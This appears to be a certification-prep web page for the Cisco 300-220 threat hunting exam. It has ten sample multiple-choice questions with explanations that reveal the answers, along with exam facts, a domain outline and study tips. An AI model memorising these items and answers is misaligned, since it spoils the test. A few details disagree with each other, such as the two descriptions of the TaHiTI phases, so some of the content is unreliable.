100+ Free Cisco 300-220 CBRTHD Practice Questions

Pass your Cisco CBRTHD: Conducting Threat Hunting and Defending using Cisco Technologies (300-220) exam on the first try — instant access, no signup required.

✓ No registration✓ No credit card✓ No hidden fees✓ Start practicing immediately

Cisco does not publish official pass rates Pass Rate

100+ Questions

100% Free

1 / 100

Question 1

Score: 0/0

Which definition best describes proactive threat hunting compared to traditional reactive incident response?

Threat hunting waits for SIEM alerts before any analyst action is taken on hosts

Threat hunting assumes adversaries are already inside the environment and searches for evidence absent of any alert

Threat hunting is the same as automated detection rule tuning in the SOC

Threat hunting only runs after an incident has been declared and contained

to track

2026 Statistics

Key Facts: Cisco 300-220 CBRTHD Exam

~60

Exam Questions

Cisco 300-220 CBRTHD

90 min

Exam Duration

Cisco

~825/1000

Approximate Cut Score

Cisco scaled scoring

$300

Exam Fee

Cisco / Pearson VUE

Professional

Level (CyberOps Concentration)

Cisco CyberOps Professional

3 years

Certification Validity

Cisco recertification cycle

The Cisco 300-220 CBRTHD exam has approximately 60 questions in 90 minutes with a scaled cut score commonly cited around 825/1000. Domains: threat hunting concepts and frameworks (20%), threat modeling techniques (20%), threat actor attribution (15%), threat hunting techniques (25%), threat hunting process (10%), threat hunting outcomes (10%). It is a CyberOps Professional concentration exam — passing it plus 350-201 CBRCOR earns the Cisco CyberOps Professional certification and the Cisco Certified Specialist - Threat Hunting badge. Exam fee is $300 USD at Pearson VUE.

Sample Cisco 300-220 CBRTHD Practice Questions

Try these sample questions to test your Cisco 300-220 CBRTHD exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 100+ question experience with AI tutoring.

1Which definition best describes proactive threat hunting compared to traditional reactive incident response?

A.Threat hunting waits for SIEM alerts before any analyst action is taken on hosts

B.Threat hunting assumes adversaries are already inside the environment and searches for evidence absent of any alert

C.Threat hunting is the same as automated detection rule tuning in the SOC

D.Threat hunting only runs after an incident has been declared and contained

Explanation: Threat hunting is hypothesis-driven and assumes the adversary may already have bypassed perimeter and detection controls. Hunters proactively search telemetry (EDR, NetFlow, DNS, identity) for evidence that no alert has yet flagged, then convert findings into new detections.

2In the OODA loop applied to threat hunting, which step involves comparing current telemetry against the hunter's mental model of the adversary's expected behavior?

A.Observe

B.Orient

C.Decide

D.Act

Explanation: Orient is where the hunter contextualizes raw observations against intel, prior incidents, and known TTPs to form an interpretation. Observe gathers telemetry; Decide chooses the next pivot; Act executes the query, containment, or escalation.

3On David Bianco's Pyramid of Pain, which indicator type causes the MOST pain to an adversary when defenders detect and block it?

A.Hash values

B.IP addresses

C.Domain names

D.Tactics, Techniques, and Procedures (TTPs)

Explanation: TTPs sit at the top of the Pyramid of Pain. Adversaries can rotate hashes, IPs, and domains cheaply, but changing techniques requires retraining and re-tooling, which is costly and slow.

4Which level of the Hunting Maturity Model (HMM) describes an organization that performs ad-hoc, analyst-driven hunts but lacks routine data collection or repeatable procedures?

A.HMM 0 — Initial

B.HMM 1 — Minimal

C.HMM 2 — Procedural

D.HMM 4 — Leading

Explanation: HMM 1 organizations consume threat intel and run ad-hoc hunts but have not codified procedures. HMM 0 has no hunting at all; HMM 2 follows published procedures; HMM 4 automates repeatable hunts and contributes intel back.

5Which framework provides a structured methodology specifically for the threat hunting lifecycle (Trigger, Hypothesis, Investigation, Discovery)?

A.TaHiTI

B.PCI-DSS

C.SOC 2 Type II

D.FedRAMP Moderate

Explanation: TaHiTI (Targeted Hunting integrating Threat Intelligence) is a methodology developed by Dutch financial sector CISOs that defines three phases — Initiate, Hunt, Finalize — built around hypothesis-driven, intel-informed hunts.

6Which MITRE ATT&CK matrix component represents the adversary's high-level goal, such as Initial Access or Lateral Movement?

A.Tactic

B.Technique

C.Sub-technique

D.Procedure

Explanation: Tactics describe WHY an adversary acts (the goal). Techniques describe HOW. Sub-techniques are more specific implementations. Procedures are the actual observed steps used by a threat actor.

7MITRE ATT&CK Navigator is most commonly used by hunt teams to:

A.Automatically remediate compromised endpoints

B.Build colored heatmap layers to visualize coverage, gaps, and threat actor overlap across techniques

C.Replace the SIEM as the primary alerting console

D.Issue digital certificates for endpoint authentication

Explanation: ATT&CK Navigator is a free MITRE web tool for annotating and visualizing the ATT&CK matrix as colored layers. Teams use it to map detection coverage, group APT TTPs, and find detection gaps.

8MITRE D3FEND complements ATT&CK by providing a knowledge graph of:

A.Adversary tradecraft only

B.Defensive countermeasures mapped to ATT&CK techniques

C.Vulnerability scoring metrics

D.Penetration testing payloads

Explanation: D3FEND is MITRE's complementary framework cataloging defensive techniques (Harden, Detect, Isolate, Deceive, Evict) and mapping them to specific ATT&CK techniques they counter.

9What is the PRIMARY difference between an Indicator of Compromise (IOC) and an Indicator of Attack (IOA)?

A.IOCs are only network-based; IOAs are only endpoint-based

B.IOCs identify post-compromise artifacts (hashes, IPs, domains); IOAs identify behaviors and intent regardless of specific artifacts

C.IOCs are always encrypted; IOAs are always plaintext

D.IOAs are deprecated and no longer used in modern SOCs

Explanation: IOCs are forensic artifacts that prove a compromise occurred (hashes, IPs, domains, registry keys). IOAs describe attacker behaviors and intent (e.g., process injection followed by credential dumping) and are more durable across infrastructure changes.

10A hunt that begins with a specific intel report stating "APT29 is using technique T1059.001 (PowerShell) for initial execution" is BEST classified as which type of hunt?

A.Unstructured (data-driven) hunt

B.Structured (hypothesis-driven) hunt

C.Situational (entity-driven) hunt

D.Exploratory hunt

Explanation: Structured hunts are explicitly hypothesis-driven and tied to a known TTP, IOA, or threat actor — exactly the case here (APT29 + T1059.001). Unstructured hunts start from anomalies in data; situational hunts focus on a critical asset or campaign.

About the Cisco 300-220 CBRTHD Exam

Cisco 300-220 CBRTHD (Conducting Threat Hunting and Defending using Cisco Technologies) is a CyberOps Professional concentration exam. It validates a hunter's ability to apply threat hunting frameworks (MITRE ATT&CK, D3FEND, TaHiTI, HMM, Pyramid of Pain, Diamond Model, Cyber Kill Chain), interpret threat intelligence (STIX/TAXII, Cisco Talos), use Cisco Secure data sources (Secure Endpoint, Stealthwatch with ETA, Secure Firewall FTD, Umbrella, ESA, WSA, ISE, Duo, Secure Workload), operate hunting tooling (Cisco XDR, SecureX orchestration, Secure Malware Analytics, Splunk Cisco apps, ELK), execute endpoint and network hunts, hand off to NIST IR, and convert findings into durable detections.

Questions

60 scored questions

Time Limit

90 minutes

Passing Score

Variable cut score (~825/1000)

Exam Fee

$300 (Cisco / Pearson VUE)

Cisco 300-220 CBRTHD Exam Content Outline

20%

Threat Hunting Concepts and Frameworks

Proactive vs reactive defense, the hunt loop and OODA, structured/unstructured/situational hunts, Pyramid of Pain (IOC vs IOA), MITRE ATT&CK (tactics/techniques/sub-techniques/procedures), ATT&CK Navigator, MITRE D3FEND, TaHiTI methodology, and the Hunting Maturity Model (HMM)

20%

Threat Modeling Techniques

Diamond Model of Intrusion Analysis (Adversary, Capability, Infrastructure, Victim and pivots), Lockheed Martin Cyber Kill Chain (Recon -> Weaponize -> Deliver -> Exploit -> Install -> C2 -> Actions on Objectives), STIX/TAXII threat intel sharing, and Cisco Talos as the integrated intel feed

15%

Threat Actor Attribution Techniques

APT profiling: targeted sectors and geography, TTPs mapped to ATT&CK, malware families and tooling overlap, infrastructure clustering, attribution caveats and confidence levels

25%

Threat Hunting Techniques (Endpoint, Network, Cisco Data Sources)

Endpoint hunts: process injection (T1055), persistence (registry Run keys, scheduled tasks, WMI), Pass-the-Hash, Golden Ticket, Kerberoasting, DCSync, LOLBins (mshta, certutil, bitsadmin), fileless malware, PowerShell encoded execution, LSASS access (T1003.001). Network hunts: beaconing, DNS tunneling, DGA, fast flux, encrypted C2 fingerprints (JA3/JA3S), data exfiltration, anomalous protocols, and Stealthwatch alarms. Cisco data sources: Secure Endpoint (process/file/network telemetry, Orbital, Trajectory), Secure Network Analytics (Stealthwatch) with NetFlow + ETA, Secure Firewall FTD/FMC, Umbrella DNS + Investigate, Secure Email (ESA), Secure Web (WSA), ISE/TrustSec, Duo, Secure Workload

10%

Threat Hunting Process and Tooling

Hypothesis development, scoping, data collection, investigation pivots, and documentation. Cisco XDR (extended detection and response), SecureX orchestration / XDR Automate, Cisco Threat Intelligence Director (TID) on FMC, Secure Malware Analytics (formerly ThreatGrid), Splunk Cisco Security apps and CIM add-ons, ELK stack

10%

Threat Hunting Outcomes (Detection Engineering, IR, Metrics)

Convert findings into versioned detections (Sigma, EDR, SIEM correlation), purple-team validation (Atomic Red Team, Caldera), NIST IR lifecycle handoff (Preparation -> Detection & Analysis -> Containment, Eradication, Recovery -> Post-Incident), playbooks, tabletops, MTTD/MTTR/dwell time, false positive tuning, and hunt report quality

How to Pass the Cisco 300-220 CBRTHD Exam

What You Need to Know

Passing score: Variable cut score (~825/1000)
Exam length: 60 questions
Time limit: 90 minutes
Exam fee: $300

Keys to Passing

Complete 500+ practice questions
Score 80%+ consistently before scheduling
Focus on highest-weighted sections
Use our AI tutor for tough concepts

Cisco 300-220 CBRTHD Study Tips from Top Performers

1Memorize the 14 MITRE ATT&CK enterprise tactics in order — the exam expects fluency

2Hunt for TTPs (top of the Pyramid of Pain) — they cause the adversary the most cost

3Know the Cisco Secure product names AND former names (Secure Endpoint = AMP, Secure Network Analytics = Stealthwatch, Secure Malware Analytics = ThreatGrid, SecureX threat response = now Cisco XDR Investigate)

4Practice mapping endpoint behaviors to specific ATT&CK techniques (T1055 process injection, T1059.001 PowerShell, T1003.001 LSASS, T1547.001 Run keys, T1053.005 scheduled tasks)

5Stealthwatch ETA detects malware in TLS WITHOUT decryption — be ready to recognize this on the exam

6Order of volatility for forensics: RAM and network state FIRST, then disk imaging, then offline artifacts

7Hunt outcomes must produce durable detections — version-controlled Sigma/EDR rules, validated with Atomic Red Team or Caldera

8Know the NIST IR lifecycle order: Preparation -> Detection & Analysis -> Containment, Eradication & Recovery -> Post-Incident Activity

Frequently Asked Questions

What is the Cisco 300-220 CBRTHD exam?

Cisco 300-220 CBRTHD (Conducting Threat Hunting and Defending using Cisco Technologies) is a CyberOps Professional concentration exam. It validates threat hunting expertise across frameworks (MITRE ATT&CK, D3FEND, TaHiTI, HMM, Pyramid of Pain, Diamond Model, Cyber Kill Chain), Cisco Secure data sources, and the hunt-to-detection lifecycle.

How many questions are on the 300-220 exam?

The Cisco 300-220 CBRTHD exam has approximately 55-65 questions delivered in 90 minutes. Question types include multiple choice (single and multiple response), drag-and-drop, and scenario-based items. Cisco does not publish the exact item count per form.

What is the passing score for Cisco 300-220?

Cisco does not publish an exact passing percentage for 300-220. Cisco professional exams are scored on a 300-1000 scale with the practical cut score commonly reported around 825/1000. Cisco may adjust cut scores between forms based on item difficulty.

How much does the Cisco 300-220 exam cost?

The Cisco 300-220 CBRTHD exam costs $300 USD at Pearson VUE. The exam can be taken at a physical Pearson VUE test center or online via OnVUE proctored delivery. Local pricing and tax may apply.

What certification does 300-220 earn?

Passing 300-220 alone earns the Cisco Certified Specialist - Threat Hunting badge. Combined with 350-201 CBRCOR (the CyberOps Professional core exam), it earns the full Cisco CyberOps Professional certification, valid for 3 years.

How long should I study for Cisco 300-220?

Plan for 80-160 hours of focused study over 2-4 months. Core resources: official Cisco CBRTHD exam topics, the Cisco CBRTHD course (or Cisco U. learning path), MITRE ATT&CK and D3FEND, hands-on labs with Cisco XDR, Secure Endpoint (Orbital), Stealthwatch ETA, Umbrella Investigate, and Secure Firewall FTD/FMC. Aim for 85%+ on full-length mocks before scheduling.